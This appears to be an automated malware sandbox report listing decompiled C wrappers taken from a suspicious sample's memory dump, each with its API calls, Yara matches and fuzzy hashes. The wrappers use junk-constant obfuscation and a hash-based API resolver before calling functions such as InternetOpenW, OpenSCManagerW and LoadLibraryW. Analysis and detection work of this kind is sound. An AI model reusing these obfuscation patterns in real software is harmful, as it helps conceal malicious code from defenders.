                          Download Yara Rule
                          C-Code - Quality: 67%
                          			E009A2C3A(void* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t23;
				int _t29;
				WCHAR* _t33;

				_push(_a12);
				_t33 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E009A358A(_t23);
				_v16 = 0x4d9c80;
				_v16 = _v16 | 0xcc7fbb6c;
				_v16 = _v16 ^ 0xcc74081e;
				_v12 = 0xfa0b63;
				_v12 = _v12 | 0xd4c459ea;
				_v12 = _v12 ^ 0xd4f66af0;
				_v8 = 0x175dc5;
				_v8 = _v8 | 0x605a8863;
				_v8 = _v8 ^ 0x60557826;
				E009B0A93(0xaea26b2f, 0x23c, __ecx, __ecx, 0x97da6f6d);
				_t29 = lstrcmpiW(_t33, _a8); // executed
				return _t29;
			}









                          0x009a2c41
                          0x009a2c44
                          0x009a2c46
                          0x009a2c49
                          0x009a2c4c
                          0x009a2c4d
                          0x009a2c4e
                          0x009a2c53
                          0x009a2c5d
                          0x009a2c64
                          0x009a2c6b
                          0x009a2c72
                          0x009a2c79
                          0x009a2c80
                          0x009a2c87
                          0x009a2c8e
                          0x009a2caf
                          0x009a2cbb
                          0x009a2cc1

                          APIs
                          • lstrcmpiW.KERNEL32(?,CC74081E,?,?,?,?,?,?,?,?,00000000), ref: 009A2CBB
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Offset: 009A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcmpi
                          • String ID: &xU`
                          • API String ID: 1586166983-1954668127
                          • Opcode ID: 33fbf76182eafc49d529afff0049f42f4ee3fc7ed41e886679a16bb7a8d61cf5
                          • Instruction ID: 77b02e2ee15b01c607830f721346249716a21c6ed2a7359795534195b4e30520
                          • Opcode Fuzzy Hash: 33fbf76182eafc49d529afff0049f42f4ee3fc7ed41e886679a16bb7a8d61cf5
                          • Instruction Fuzzy Hash: DF011675D01248BBDB04DFD5994A9DEBFB4EF44310F00C088F81966221D7719B109B95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 009A70AE, Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON
                          Download Yara Rule
                          C-Code - Quality: 60%
                          			E009A70AE(void* __ecx, intOrPtr _a4, long _a12, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t34;
				void* _t43;
				signed int _t45;

				_push(_a28);
				_push(_a24);
				_push(0);
				_push(0);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E009A358A(_t34);
				_v12 = 0x3a1597;
				_v12 = _v12 ^ 0x517cc252;
				_v12 = _v12 ^ 0x561fa9e5;
				_v12 = _v12 ^ 0x075d6bc8;
				_v16 = 0xd0655c;
				_t45 = 0x6a;
				_v16 = _v16 / _t45;
				_v16 = _v16 ^ 0x000e6e3b;
				_v8 = 0x619b10;
				_v8 = _v8 * 0x27;
				_v8 = _v8 ^ 0x1a3c1f87;
				_v8 = _v8 + 0x30fc;
				_v8 = _v8 ^ 0x14ed11c6;
				E009B0A93(0xa29290ec, 0x1e6, _t45, _t45, 0x746d919);
				_t43 = InternetOpenW(0, _a12, 0, 0, 0); // executed
				return _t43;
			}









                          0x009a70b5
                          0x009a70ba
                          0x009a70bd
                          0x009a70be
                          0x009a70bf
                          0x009a70c2
                          0x009a70c3
                          0x009a70c6
                          0x009a70c8
                          0x009a70cd
                          0x009a70d7
                          0x009a70e0
                          0x009a70e7
                          0x009a70ee
                          0x009a70fa
                          0x009a7102
                          0x009a7105
                          0x009a710c
                          0x009a7123
                          0x009a7126
                          0x009a712d
                          0x009a7134
                          0x009a7144
                          0x009a7153
                          0x009a7159

                          APIs
                          • InternetOpenW.WININET(00000000,?,00000000,00000000,00000000), ref: 009A7153
                          Memory Dump Source
                          • Source File: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Offset: 009A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: InternetOpen
                          • String ID:
                          • API String ID: 2038078732-0
                          • Opcode ID: 238cd2576733518ebe7c14f8d9ab394c9447c65f6aa93e110a8d2de05a62e99a
                          • Instruction ID: 56f525cadd47a10a3cad69c527e79daff1a4fd2ea28797b85cad492b4de373a5
                          • Opcode Fuzzy Hash: 238cd2576733518ebe7c14f8d9ab394c9447c65f6aa93e110a8d2de05a62e99a
                          • Instruction Fuzzy Hash: E3114672D01218FBDB14DFA5CD4A8DFBFB9EF46350F108199F51966250E2729B20DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 009C021F, Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E009C021F(void* __ecx, void* __edx, long _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t35;
				void* _t43;
				signed int _t45;
				void* _t50;

				_push(_a16);
				_t50 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E009A358A(_t35);
				_v12 = 0xc0e5f1;
				_v12 = _v12 + 0xda00;
				_v12 = _v12 ^ 0x48d5c3e6;
				_v12 = _v12 ^ 0x481bdc7d;
				_v8 = 0x17bc7;
				_v8 = _v8 >> 0xb;
				_t45 = 0x7b;
				_v8 = _v8 / _t45;
				_v8 = _v8 << 0xd;
				_v8 = _v8 ^ 0x0006db1e;
				_v16 = 0xca237e;
				_v16 = _v16 + 0xef11;
				_v16 = _v16 ^ 0x00ccab0e;
				E009B0A93(0x8caed929, 0x317, _t45, _t45, 0x97da6f6d);
				_t43 = RtlAllocateHeap(_t50, _a8, _a4); // executed
				return _t43;
			}










                          0x009c0226
                          0x009c0229
                          0x009c022b
                          0x009c022e
                          0x009c0231
                          0x009c0235
                          0x009c0236
                          0x009c023b
                          0x009c0245
                          0x009c024e
                          0x009c0255
                          0x009c025c
                          0x009c0263
                          0x009c026c
                          0x009c0274
                          0x009c0277
                          0x009c027b
                          0x009c0282
                          0x009c0289
                          0x009c0290
                          0x009c02ac
                          0x009c02bb
                          0x009c02c1

                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,00CCAB0E,481BDC7D,?,?,?,?,?,?,?,?,?,00000008), ref: 009C02BB
                          Memory Dump Source
                          • Source File: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Offset: 009A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 5ba53a84485e4440559d0fb43da91978a7bcc9bb3a354e9c732d1687a8d7d57f
                          • Instruction ID: 2df52bb71971c57f1da71ec60edd8382b1d9a7f479b5c2a21565c570a41ca1da
                          • Opcode Fuzzy Hash: 5ba53a84485e4440559d0fb43da91978a7bcc9bb3a354e9c732d1687a8d7d57f
                          • Instruction Fuzzy Hash: 7F1103B6D0120CFFDF05DF94C94A9DEBBB5EB44314F108089F91466250E3B59B249F91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 009AACDB, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E009AACDB(void* __ecx, void* __edx, intOrPtr _a4, int _a8, intOrPtr _a16) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				short* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t32;
				void* _t39;

				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(0);
				E009A358A(_t32);
				_v28 = 0x3efa7c;
				_v24 = 0x1427a1;
				_v20 = 0;
				_v16 = 0x3999dc;
				_v16 = _v16 * 0x69;
				_v16 = _v16 ^ 0x17a33522;
				_v8 = 0x98febf;
				_v8 = _v8 | 0xa9f18d33;
				_v8 = _v8 + 0xffff27c9;
				_v8 = _v8 + 0xffff7e19;
				_v8 = _v8 ^ 0xa9f83f7b;
				_v12 = 0x9aad70;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 ^ 0x00028f30;
				E009B0A93(0x1ae4c564, 0x18, __ecx, __ecx, 0x2a841103);
				_t39 = OpenSCManagerW(0, 0, _a8); // executed
				return _t39;
			}











                          0x009aace2
                          0x009aace7
                          0x009aace8
                          0x009aaceb
                          0x009aacef
                          0x009aacf0
                          0x009aacf5
                          0x009aacff
                          0x009aad06
                          0x009aad09
                          0x009aad1d
                          0x009aad25
                          0x009aad2c
                          0x009aad33
                          0x009aad3a
                          0x009aad41
                          0x009aad48
                          0x009aad4f
                          0x009aad56
                          0x009aad5a
                          0x009aad5e
                          0x009aad6e
                          0x009aad7b
                          0x009aad81

                          APIs
                          • OpenSCManagerW.ADVAPI32(00000000,00000000,17A33522), ref: 009AAD7B
                          Memory Dump Source
                          • Source File: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Offset: 009A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: ManagerOpen
                          • String ID:
                          • API String ID: 1889721586-0
                          • Opcode ID: a651a9cbf6b6e1e0a2c05f2e577fa9f9acdeeabfbbfe254e42d889b7a50bbc8b
                          • Instruction ID: b62b4a7888512d5e9e38bd21dd0c7f24aa4e1025877e3fbd599badee61125979
                          • Opcode Fuzzy Hash: a651a9cbf6b6e1e0a2c05f2e577fa9f9acdeeabfbbfe254e42d889b7a50bbc8b
                          • Instruction Fuzzy Hash: 78111076C12218BB9B45EFA8DA4A9EEBFB4EB51310F508189E814A7261D3B14B149F90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 009A73C8, Relevance: 1.5, APIs: 1, Instructions: 46fileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 67%
                          			E009A73C8(struct _WIN32_FIND_DATAW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t27;
				int _t35;
				void* _t39;
				struct _WIN32_FIND_DATAW* _t40;

				_push(_a16);
				_t39 = __edx;
				_t40 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E009A358A(_t27);
				_v12 = 0x5e020c;
				_v12 = _v12 + 0xdf50;
				_v12 = _v12 | 0x3c889ce2;
				_v12 = _v12 ^ 0x3cd6ff99;
				_v16 = 0xd4e4b8;
				_v16 = _v16 * 0x6e;
				_v16 = _v16 ^ 0x5b7091d7;
				_v8 = 0x59595;
				_v8 = _v8 * 0x12;
				_v8 = _v8 | 0x73df2f2f;
				_v8 = _v8 ^ 0x73fefa1d;
				E009B0A93(0xb664e2af, 0x7f, __ecx, __ecx, 0x97da6f6d);
				_t35 = FindNextFileW(_t39, _t40); // executed
				return _t35;
			}










                          0x009a73d0
                          0x009a73d3
                          0x009a73d5
                          0x009a73d7
                          0x009a73da
                          0x009a73dd
                          0x009a73e0
                          0x009a73e1
                          0x009a73e2
                          0x009a73e7
                          0x009a73f1
                          0x009a73f8
                          0x009a73ff
                          0x009a7406
                          0x009a741a
                          0x009a7422
                          0x009a7429
                          0x009a7434
                          0x009a7437
                          0x009a743e
                          0x009a744e
                          0x009a7458
                          0x009a745f

                          APIs
                          Memory Dump Source
                          • Source File: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Offset: 009A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: FileFindNext
                          • String ID:
                          • API String ID: 2029273394-0
                          • Opcode ID: 1ea09874ed8103d3a330ef62c0b921615f916204ea1479fd66e46b74954288b0
                          • Instruction ID: bb128cc0609a84ddda98919d2499f2ad5fc2c1f4d324a07e86292dddf32e2a14
                          • Opcode Fuzzy Hash: 1ea09874ed8103d3a330ef62c0b921615f916204ea1479fd66e46b74954288b0
                          • Instruction Fuzzy Hash: E51139B5C01209FBDB04DFA9D9469DEBFB4EB84310F208099F918A7260E7755B14DF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 009BA173, Relevance: 1.5, APIs: 1, Instructions: 41memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 64%
                          			E009BA173(void* __ecx, void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12, void* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t29;
				char _t36;

				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E009A358A(_t29);
				_v16 = 0x7afddc;
				_v16 = _v16 ^ 0x6856c96f;
				_v16 = _v16 ^ 0x68207cc6;
				_v12 = 0xb8cf72;
				_v12 = _v12 | 0x88d01a4e;
				_v12 = _v12 * 0x12;
				_v12 = _v12 ^ 0xa174b16a;
				_v8 = 0xf8369;
				_v8 = _v8 + 0xffff992b;
				_v8 = _v8 + 0xffff6268;
				_v8 = _v8 ^ 0x00056568;
				E009B0A93(0x434e1cf8, 0x2e1, __ecx, __ecx, 0x97da6f6d);
				_t36 = RtlFreeHeap(_a4, 0, _a16); // executed
				return _t36;
			}








                          0x009ba179
                          0x009ba17b
                          0x009ba17e
                          0x009ba181
                          0x009ba184
                          0x009ba188
                          0x009ba189
                          0x009ba18e
                          0x009ba198
                          0x009ba19f
                          0x009ba1a6
                          0x009ba1ad
                          0x009ba1c4
                          0x009ba1cc
                          0x009ba1d3
                          0x009ba1da
                          0x009ba1e1
                          0x009ba1e8
                          0x009ba1f8
                          0x009ba208
                          0x009ba20d

                          APIs
                          • RtlFreeHeap.NTDLL(A174B16A,00000000,?), ref: 009BA208
                          Memory Dump Source
                          • Source File: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Offset: 009A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          • Opcode ID: 2d75a9b0b6b99655ee2a2e51cae27aedc75d5503d53e47ab9b6cc7083230757c
                          • Instruction ID: 302580cdef0784cf5dce5bfb151ffbedf9a5739a6dcc19ee43a6c343361aaf88
                          • Opcode Fuzzy Hash: 2d75a9b0b6b99655ee2a2e51cae27aedc75d5503d53e47ab9b6cc7083230757c
                          • Instruction Fuzzy Hash: 25010571D0120CFFDF54DFA8CE06A9EBFB4EB44700F608188E914A6261E3729B64AB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 009C2DAA, Relevance: 1.5, APIs: 1, Instructions: 36libraryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 77%
                          			E009C2DAA(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t21;
				struct HINSTANCE__* _t27;
				WCHAR* _t31;

				_push(_a8);
				_t31 = __ecx;
				_push(_a4);
				_push(__ecx);
				E009A358A(_t21);
				_v16 = 0xe4edb8;
				_v16 = _v16 + 0xffff324f;
				_v16 = _v16 ^ 0x00e4d338;
				_v12 = 0x4aa4e3;
				_v12 = _v12 | 0x47be1ae1;
				_v12 = _v12 ^ 0x47f82da6;
				_v8 = 0x5f13c8;
				_v8 = _v8 + 0xffffe959;
				_v8 = _v8 ^ 0x0055a0fc;
				E009B0A93(0xf7ec3422, 5, __ecx, __ecx, 0x97da6f6d);
				_t27 = LoadLibraryW(_t31); // executed
				return _t27;
			}









                          0x009c2db1
                          0x009c2db4
                          0x009c2db6
                          0x009c2dba
                          0x009c2dbb
                          0x009c2dc0
                          0x009c2dca
                          0x009c2dd1
                          0x009c2dd8
                          0x009c2ddf
                          0x009c2de6
                          0x009c2ded
                          0x009c2df4
                          0x009c2dfb
                          0x009c2e19
                          0x009c2e22
                          0x009c2e28

                          APIs
                          • LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 009C2E22
                          Memory Dump Source
                          • Source File: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Offset: 009A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: fa0b9ba42ca251ba5c1ef1ce6445bbbddcbdfd736c10d6ad21ab5a4b44c371a5
                          • Instruction ID: 0e8618e1bc7c2e88b212dc54189cd12f0a01da5f9d08b865fc89698ee742fc1b
                          • Opcode Fuzzy Hash: fa0b9ba42ca251ba5c1ef1ce6445bbbddcbdfd736c10d6ad21ab5a4b44c371a5
                          • Instruction Fuzzy Hash: 4B014B76C01218FBDB54EFA4890A8DEBFB4EB80310F108189E81476251E7B16B149B91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 009B4A33, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                          Download Yara Rule
                          C-Code - Quality: 85%
                          			E009B4A33(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				void* _t25;
				int _t31;

				_push(_a4);
				_push(__ecx);
				E009A358A(_t25);
				_v16 = 0x36d040;
				_v16 = _v16 >> 3;
				_v16 = _v16 ^ 0x000ed2c4;
				_v12 = 0x8d9e7;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 ^ 0x9c63d73c;
				_v12 = _v12 ^ 0x9c6af444;
				_v8 = 0x5b66fe;
				_v8 = _v8 << 0xd;
				_v8 = _v8 | 0x4c53bd11;
				_v8 = _v8 ^ 0x6cd412c8;
				E009B0A93(0x3380cc20, 0x183, __ecx, __ecx, 0x97da6f6d);
				_t31 = FindCloseChangeNotification(_a4); // executed
				return _t31;
			}








                          0x009b4a39
                          0x009b4a3d
                          0x009b4a3e
                          0x009b4a43
                          0x009b4a4d
                          0x009b4a51
                          0x009b4a58
                          0x009b4a5f
                          0x009b4a63
                          0x009b4a6a
                          0x009b4a71
                          0x009b4a78
                          0x009b4a7c
                          0x009b4a83
                          0x009b4aa4
                          0x009b4aaf
                          0x009b4ab4

                          APIs
                          • FindCloseChangeNotification.KERNEL32(9C6AF444), ref: 009B4AAF
                          Memory Dump Source
                          • Source File: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Offset: 009A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: ChangeCloseFindNotification
                          • String ID:
                          • API String ID: 2591292051-0
                          • Opcode ID: 9e5bd5d73aec3ea279f7cdbeccba634f714557f0b111e67455b7d3a5834c50fd
                          • Instruction ID: f09b07f4a89e7e4fd50a4ad05e51d1bbb26a0d2b391849a9ef924d966d156874
                          • Opcode Fuzzy Hash: 9e5bd5d73aec3ea279f7cdbeccba634f714557f0b111e67455b7d3a5834c50fd
                          • Instruction Fuzzy Hash: E101E475E0020CFBCB45EFA4C94A99EBFB4EB40704F10C188E515A6221E6B5AB149F81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions